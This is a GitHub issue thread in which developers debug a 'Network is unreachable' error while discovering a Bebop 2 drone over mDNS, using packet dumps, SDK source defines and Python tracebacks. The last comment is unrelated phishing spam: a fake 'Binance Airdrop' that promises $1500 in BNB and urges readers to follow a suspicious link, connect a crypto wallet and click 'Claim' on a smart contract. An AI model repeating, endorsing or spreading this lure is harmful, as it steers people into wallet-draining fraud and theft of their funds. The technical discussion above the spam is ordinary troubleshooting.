### ISSUE TITLE
"Network is unreachable" when discovering Bebop 2 _arsdk-090c

### ISSUE THREAD

**Issue by phrohdoh** [Phrohdoh/arini-discovery#1]
```rust
Failed to discover _arsdk-090c: Error { kind: Io(Error { repr: Os { code: 51, message: "Network is unreachable" } }), state: State { next_error:
 None, backtrace: Some(...) } }
```

**Comment by phrohdoh** [comment]
## Brain dump:

Here is a response I got using `dns-sd`:

```
Lookup Bebop2-008234._arsdk-090c._udp.local
DATE: ---Sun 04 Dec 2016---
 8:43:02.957  ...STARTING...
 8:43:02.959  Bebop2-008234._arsdk-090c._udp.local. can be reached at Bebop2-008234.local.:44444 (interface 4)
 \{\"device_id\":\"PI040384AG6G008234\"\}
```

Here is my capture (had to zip it up to please github) and some data I pulled out of it (using the display filter `tcp.dstport == 44444`):
[bebop2-wireshark-capture.pcapng.zip](https://github.com/dylanmckay/mdns/files/629590/bebop2-wireshark-capture.pcapng.zip)

```
0000   a0 14 3d c6 75 f1 9c f3 87 d1 24 c8 08 00 45 02  ..=.u.....$...E.
0010   01 26 f9 b1 40 00 40 06 6a 79 c0 a8 2a 53 c0 a8  .&..@.@.jy..*S..
0020   2a 01 e2 99 ad 9c 9a a6 64 c0 0b 73 75 67 80 18  *.......d..sug..
0030   10 15 8e d5 00 00 01 01 08 0a 3a 0c 57 9d 00 00  ..........:.W...
0040   e5 f2 7b 20 22 71 6f 73 5f 6d 6f 64 65 22 3a 20  ..{ "qos_mode": 
0050   31 2c 20 22 64 32 63 5f 70 6f 72 74 22 3a 20 34  1, "d2c_port": 4
0060   39 33 30 32 2c 20 22 61 72 73 74 72 65 61 6d 32  9302, "arstream2
0070   5f 63 6c 69 65 6e 74 5f 73 74 72 65 61 6d 5f 70  _client_stream_p
0080   6f 72 74 22 3a 20 36 34 33 36 38 2c 20 22 61 72  ort": 64368, "ar
0090   73 74 72 65 61 6d 32 5f 63 6c 69 65 6e 74 5f 63  stream2_client_c
00a0   6f 6e 74 72 6f 6c 5f 70 6f 72 74 22 3a 20 36 34  ontrol_port": 64
00b0   36 31 35 2c 20 22 61 72 73 74 72 65 61 6d 32 5f  615, "arstream2_
00c0   73 75 70 70 6f 72 74 65 64 5f 6d 65 74 61 64 61  supported_metada
00d0   74 61 5f 76 65 72 73 69 6f 6e 22 3a 20 31 2c 20  ta_version": 1, 
00e0   22 63 6f 6e 74 72 6f 6c 6c 65 72 5f 6e 61 6d 65  "controller_name
00f0   22 3a 20 22 44 45 46 41 55 4c 54 5f 53 44 4b 5f  ": "DEFAULT_SDK_
0100   43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 20 22 63 6f  CONTROLLER", "co
0110   6e 74 72 6f 6c 6c 65 72 5f 74 79 70 65 22 3a 20  ntroller_type": 
0120   22 44 45 46 41 55 4c 54 5f 53 44 4b 5f 54 59 50  "DEFAULT_SDK_TYP
0130   45 22 20 7d                                      E" }

{ "qos_mode": 1, "d2c_port": 49302, "arstream2_client_stream_port": 64368, "arstream2_client_control_port": 64615, "arstream2_supported_metadata_version": 1, "controller_name": "DEFAULT_SDK_CONTROLLER", "controller_type": "DEFAULT_SDK_TYPE" }{ "status": 0, "c2d_port": 54321, "c2d_update_port": 51, "c2d_user_port": 21, "qos_mode": 1, "arstream2_server_stream_port": 5004, "arstream2_server_control_port": 5005 }.
```

This lead me to a generated C file that contains:
```
/**
 * @brief JSON strings for UDP ports extraction
 */
#define ARDISCOVERY_CONNECTION_JSON_STATUS_KEY                              "status"
#define ARDISCOVERY_CONNECTION_JSON_C2DPORT_KEY                             "c2d_port"
#define ARDISCOVERY_CONNECTION_JSON_D2CPORT_KEY                             "d2c_port"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM_FRAGMENT_SIZE_KEY              "arstream_fragment_size"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM_FRAGMENT_MAXIMUM_NUMBER_KEY    "arstream_fragment_maximum_number"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM_MAX_ACK_INTERVAL_KEY           "arstream_max_ack_interval"
#define ARDISCOVERY_CONNECTION_JSON_CONTROLLER_TYPE_KEY                     "controller_type"
#define ARDISCOVERY_CONNECTION_JSON_CONTROLLER_NAME_KEY                     "controller_name"
#define ARDISCOVERY_CONNECTION_JSON_DEVICE_ID_KEY                           "device_id"
#define ARDISCOVERY_CONNECTION_JSON_C2D_UPDATE_PORT_KEY                     "c2d_update_port"
#define ARDISCOVERY_CONNECTION_JSON_C2D_USER_PORT_KEY                       "c2d_user_port"
#define ARDISCOVERY_CONNECTION_JSON_SKYCONTROLLER_VERSION                   "skycontroller_version"
#define ARDISCOVERY_CONNECTION_JSON_FEATURES_KEY                            "features"
#define ARDISCOVERY_CONNECTION_JSON_QOS_MODE_KEY                            "qos_mode"

/**
 * ARStream2 specific keys
 */
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_CLIENT_STREAM_PORT_KEY          "arstream2_client_stream_port"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_CLIENT_CONTROL_PORT_KEY         "arstream2_client_control_port"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_SERVER_STREAM_PORT_KEY          "arstream2_server_stream_port"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_SERVER_CONTROL_PORT_KEY         "arstream2_server_control_port"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_MAX_PACKET_SIZE_KEY             "arstream2_max_packet_size"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_MAX_LATENCY_KEY                 "arstream2_max_latency"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_MAX_NETWORK_LATENCY_KEY         "arstream2_max_network_latency"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_MAX_BITRATE_KEY                 "arstream2_max_bitrate"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_SUPPORTED_METADATA_VERSION_KEY  "arstream2_supported_metadata_version"
#define ARDISCOVERY_CONNECTION_JSON_ARSTREAM2_PARAMETER_SETS_KEY              "arstream2_parameter_sets"

/**
 * Audio specific keys
 */
#define ARDISCOVERY_CONNECTION_JSON_AUDIO_CODEC_VERSION_KEY                 "audio_codec"

/**
 * Audio specific keys
 */
#define ARDISCOVERY_CONNECTION_JSON_AUDIO_CODEC_VERSION_KEY                 "audio_codec"
```

I am not sure what exactly needs to be included in the service name to perform a successful discovery.

`_arsdk-090c`, `_arsdk-090c._udp`, and `_arsdk-090c._udp.local` yield "network is unreachable" while `_arsdk-090c._udp.local.` returns an InvalidQuery error.

**Comment by dylanmckay** [comment]
What occurs when you use the full `Bebop2-008234._arsdk-090c._udp.local` for the query with mDNS?

**Comment by phrohdoh** [comment]
I get the same `Network is unreachable` Io error.

**Comment by phrohdoh** [comment]
I have this same issue using pyardrone:

```python
import time
from pyardrone import ARDrone

drone = ARDrone()
drone.navdata_ready.wait()
while not drone.state.fly_mask:
    drone.takeoff()

time.sleep(2)
while drone.state.fly_mask:
    drone.land()
```

```
(venv_arini) tmba:arini-test thill $ python main.py
Traceback (most recent call last):
  File "main.py", line 4, in <module>
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/local/Cellar/python3/3.5.2_3/Frameworks/Python.framework/Versions/3.5/lib/python3.5/threading.py", line 914, in _bootstrap_inner
    self.run()
  File "/usr/local/Cellar/python3/3.5.2_3/Frameworks/Python.framework/Versions/3.5/lib/python3.5/threading.py", line 862, in run
    self._target(*self._args, **self._kwargs)
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/at/__init__.py", line 209, in _watchdog_job
    self.send(COMWDG(), log=self.log_comwdg)
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/at/__init__.py", line 205, in send
    self.send_bytes(packed, log=log)
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/at/__init__.py", line 190, in send_bytes
    self.sock.sendto(bytez, (self.host, self.port))
OSError: [Errno 51] Network is unreachable

    drone = ARDrone()
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/__init__.py", line 53, in __init__
    self.connect()
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/abc.py", line 22, in connect
    self._connect()
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/__init__.py", line 92, in _connect
    self.navdata_client.connect()
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/abc.py", line 22, in connect
    self._connect()
  File "/Users/thill/projects/play/python/arini-test/venv_arini/lib/python3.5/site-packages/pyardrone/navdata/__init__.py", line 107, in _connect
    (self.host, self.port)
OSError: [Errno 51] Network is unreachable
```

The issue must be my machine somehow.
AFAIK nothing is using port 5353, so I do not know what is causing this.

**Comment by phrohdoh** [comment]
```
tmba:arini-discovery thill $ netstat -b 5353
            input        (Total)           output
   packets  errs      bytes    packets  errs      bytes colls

tmba:arini-discovery thill $ netstat -b 44444
            input        (Total)           output
   packets  errs      bytes    packets  errs      bytes colls
```

**Comment by phrohdoh** [comment]
I can control the bebop via [`node-bebop`](https://github.com/hybridgroup/node-bebop), so that must be doing something right.

**Comment by phrohdoh** [comment]
`node-bebop` seems to handle sockets directly which may be what I need to do, too.

https://github.com/hybridgroup/node-bebop/blob/88512f1bfa0e8321c269961442a373fa4c9e1df5/lib/bebop.js#L151-L157

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
